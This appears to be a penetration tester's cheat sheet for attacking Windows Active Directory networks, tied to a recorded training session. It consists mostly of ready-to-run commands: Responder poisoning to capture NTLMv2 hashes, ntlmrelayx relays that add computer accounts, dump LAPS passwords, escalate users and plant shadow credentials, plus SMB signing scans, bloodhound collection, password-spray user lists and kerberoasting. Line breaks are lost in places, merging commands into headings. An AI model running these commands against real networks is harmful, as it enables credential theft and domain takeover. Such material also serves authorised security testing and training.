There’s a video from November 1, 2022 at https://s1hb-my.sharepoint.com/personal/kickler_blackhillsinfosec_com/_layouts/15/stream.aspx?id=%2Fpersonal%2Fkickler%5Fblackhillsinfosec%5Fcom%2FDocuments%2FRecordings%2FAttempt%20%5F2%5F%20Tech%20Topic%20%2D%20Responder%20%2B%20Relay%20Basics%2D20221101%5F130244%2DMeeting%20Recording%2Emp4&ct=1672945969910&or=Teams-HL&ga=1
Setup
virtual environments for python tooling
apt install python3-virtualenv
virtualenv -p python3 toolenv
source toolenv/bin/activate
deactivate # to exitidentify DCs by name
cat /etc/resolv.conf
dig -x <IP>
dig domain.tldinstall responder, run responder
responder -A -I eth0
responder -w -I eth0 # capture hashes
responder -wFPv -I eth0 # capture hashes and hijack browserscrack hashes
- Phil’s sort hashes one liner
cd /opt/Responder/logs && for i in $(cat *-NTLMv2*.txt | cut -d':' -f1 | sort -u); do grep --no-filename -E "($i|${i//$/\\$})" *-NTLMv2*.txt | head -n1 ; done- if creds, skip to bloodhound / getadusers / getuserspns
- else no creds, ntlmrelayx
nmap, check smb services for signing
nmap --script=smb-security-mode.nse -sU -sT -p U:137,T:139,T:445 >scoped-ips< -oA smbtargets # check for smb signing and build targetscrackmapexec smb targets gen
crackmapexec smb 172.16.1.0/24 --gen-relay-list relayTargets.txtimpacket, few different tools here
ldap/ldaps relay with ntlmrelayx
python3 ntlmrelayx.py -6 -t ldaps://dc01 -wh bhis-wpad --add-computer bhis-itops2 --delegate-access -ts -of /opt/work/relays --dump-laps -l /opt/work/loots --escalate-user popped.user | tee -a ldaps-relay.logdid you say wpad poisoning?
if you got some bites on the relay with -wh bhis-wpad then it is probable that machines may authenticate
- you will have to filter results and responses to determine which machines have accepted your
-wh bhis-wpadoffer - the
--shadow-target 'object$'flag must reflect the systems you are targeting - make sure you
|tee -a outputfor impacket tooling
python3 ntlmrelayx.py -6 -wh bhis-wpad -t ldap://10.10.10.10 -smb2support --shadow-credentials --shadow-target 'DB-Srv01$' --no-smb-server --no-validate-privs -l /opt/loot |tee -a /opt/ntlmrelay-out-shadow-creds
- follow the rest of this attack path with standard shadow credentials TTPs
- The PKINITTools section under internal could be used as a basic reference
- Gabriel has some advanced stuff in his archives about this too
smb relay with ntlmrelayx
python3 ntlmrelayx.py -tf smbtargets.file -ts -of /opt/work/relays -l /opt/work/loot -smb2support |tee -a smb-relay.logCreds?
bloodhound.py — collect data
python3.9 bloodhound.py -c ALL -u 'popped.user' -p 'REDACTED' --domain 'domain.tld' -v --zip -dc 'DC01.domain.tld'getadusers.py — gather users
- for use with password sprays
getuserspns.py — kerberoast
- grab kerberos hashes
- crack them